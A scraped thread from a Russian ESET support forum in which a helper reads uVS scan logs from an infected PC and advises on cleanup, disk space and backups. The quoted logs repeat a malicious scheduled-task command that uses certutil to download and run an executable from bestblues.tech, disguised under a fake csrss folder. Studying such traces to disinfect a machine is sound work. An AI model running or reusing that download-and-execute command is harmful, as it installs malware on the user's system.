Наш форум переведен в режим работы "только для чтения", публикация новых тем и сообщений недоступна. Мы искренне благодарны вам за то, что были с нами, но пришло время двигаться дальше. После официального ухода компании ESET с российского рынка мы приступили к разработке новых продуктов вместе с новыми партнёрами. Приглашаем вас присоединиться к нашему новому форуму PRO32.
Мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.
Купить и продлить лицензии ESET на нашем сайте больше нельзя.
Предлагаем вам попробовать новые продукты компании PRO32.
PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств. Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.
Программа показывает два объекта. Первый это ссылка на исполняемый файл. ( что само по себе подозрительно :) Второй путь до директории: APPDATA с нелепой маскировкой под системный C:\Windows\System32\csrss.exe и не менее "интеллектуальной" маскировкой SCHEDULED.EXE SCHEDULED.EXE планировщик... ------------ В развёрнутом виде это:
Код
Полное имя HTTPS://BESTBLUES.TECH/APP/APP.EXE
Имя файла HTTPS://BESTBLUES.TECH/APP/APP.EXE
Тек. статус ПОДОЗРИТЕЛЬНЫЙ
Сохраненная информация на момент создания образа
Статус
Доп. информация на момент обновления списка
Файл C:\WINDOWS\SYSTEM32\CMD.EXE
Ссылки на объект
Ссылка HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\Actions
Actions "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340
Ссылка HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\
+
Код
Полное имя C:\USERS\RAMZES\APPDATA\LOCAL\TEMP\CSRSS\SCHEDULED.EXE
Имя файла SCHEDULED.EXE
Тек. статус ПОДОЗРИТЕЛЬНЫЙ
Сохраненная информация на момент создания образа
Статус ПОДОЗРИТЕЛЬНЫЙ
Инф. о файле Не удается найти указанный файл.
Цифр. подпись проверка не производилась
Статус ПОДОЗРИТЕЛЬНЫЙ ОБЪЕКТ
Путь до файла Типичен для вирусов и троянов
Доп. информация на момент обновления списка
Файл C:\WINDOWS\SYSTEM32\CMD.EXE
Ссылки на объект
Ссылка HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\Actions
Actions "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340
Actions "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340
Ссылка HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\
Полное имя HTTPS://BESTBLUES.TECH/APP/APP.EXE
Имя файла HTTPS://BESTBLUES.TECH/APP/APP.EXE
Тек. статус ПОДОЗРИТЕЛЬНЫЙ
Сохраненная информация на момент создания образа
Статус
Доп. информация на момент обновления списка
Файл C:\WINDOWS\SYSTEM32\CMD.EXE
Ссылки на объект
Ссылка HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\Actions
Actions "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340
Ссылка HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}
+
Код
Полное имя C:\USERS\RAMZES\APPDATA\LOCAL\TEMP\CSRSS\SCHEDULED.EXE
Имя файла SCHEDULED.EXE
Тек. статус ПОДОЗРИТЕЛЬНЫЙ
Сохраненная информация на момент создания образа
Статус ПОДОЗРИТЕЛЬНЫЙ
Инф. о файле Не удается найти указанный файл.
Цифр. подпись проверка не производилась
Статус ПОДОЗРИТЕЛЬНЫЙ ОБЪЕКТ
Путь до файла Типичен для вирусов и троянов
Доп. информация на момент обновления списка
Файл C:\WINDOWS\SYSTEM32\CMD.EXE
Ссылки на объект
Ссылка HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\Actions
Actions "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340
Actions "cmd.exe" /C certutil.exe -urlcache -split -f https://bestblues.tech/app/app.exe C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\RAMZES\AppData\Local\Temp\csrss\scheduled.exe /31340
Ссылка HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{37EB31A5-D47D-4A6E-B47B-4FEB2E2AF0F5}\
1) Скопируйте текст КОДа - в буфер обмена. uVS: start.exe, текущий пользователь, меню, скрипты - выполнить скрипт из буфера обмена. ПЕРЕД ВЫПОЛНЕНИЕМ СКРИПТА, ЗАКРЫТЬ БРАУЗЕРЫ! ВНИМАНИЕ : По окончанию выполнения скрипта компьютер выполнит перезагрузку !
после завершения сканирования: Записи относящиеся к Mail.Ru и Yandex можете не удалять ( если пользуетесь программой ) На вкладке: Папки (Folders) для Mail.Ru и Yandex снимите [V]
Удалите найденное в AdwCleaner по кнопке Очистить (Clean), подтвердите действие с автоперезагрузкой
1) Место могут занимать сами точки восстановления ( их можно удалить ) 2) Файл Подкачки ( временно отключить ) 3) Файл Гибернации (временно отключить ) Можно сжать файлы средствами самой системы. ( потом всё вернуть, как было )
Программа: TreeSize Free покажет, что и где занимает место на диске. jam-software.com/treesize_free
Резервные копии, создаваемые программой Acronis True Image 2020, имеют расширение TIBX. По умолчанию они создаются с использованием сжатия данных, поэтому требуется гораздо меньше дискового пространства для их хранения. Степень сжатия всегда можно настроить перед запуском резервного копирования. В контекстном меню выбрать команду Сжать том...
В общим читаем.
ESET не на системный диск, Как это будет работать?
Копии драйверов нужны, если они нужны :) ( можно отдельно почитать, для чего и как создаются копии драйверов ) ---- Можно взять флешку с установщиком системы Windows и создать на флешке свою папку\папки и кинуть туда нужные данные. т.е. это будет ваш: " установочный носитель " + ваши файлы. Установщик ваши папки и файлы в них просто проигнорирует.
ESET не на системный диск, Как это будет работать?
Подозрительный Человек написал: 1. Качаю/обновляю все драйвера, чтобы они сохранились в бекапе
Идея так себе. а) На момент восстановления бекапа драйвера всё равно устареют. б) Не всегда новые драйвера подходят\встают, так, как нужно. Поэтому многие и сидят на старых ( или часть новые часть старые ) в) Драйвера можно обновить но: 1) Создать резервную копию старых 2) Перед созданием бекапа некоторое время поработать и убедиться, что система нормально работает, корректно загружается в общем всё хорошо. Тогда и создавать бекап - иначе при восстановлении можно получить неожиданную проблему...
Цитата
Подозрительный Человек написал: То есть могут и флешке не дать записать/воспроизвести бекап? А как же тогда бекапить то?
Подразумевается, что человек который восстанавливает систему предварительно форматирует диск. т.е. устанавливает чистую систему на чистый диск. Или на систему без вирусов иначе какой смысл ?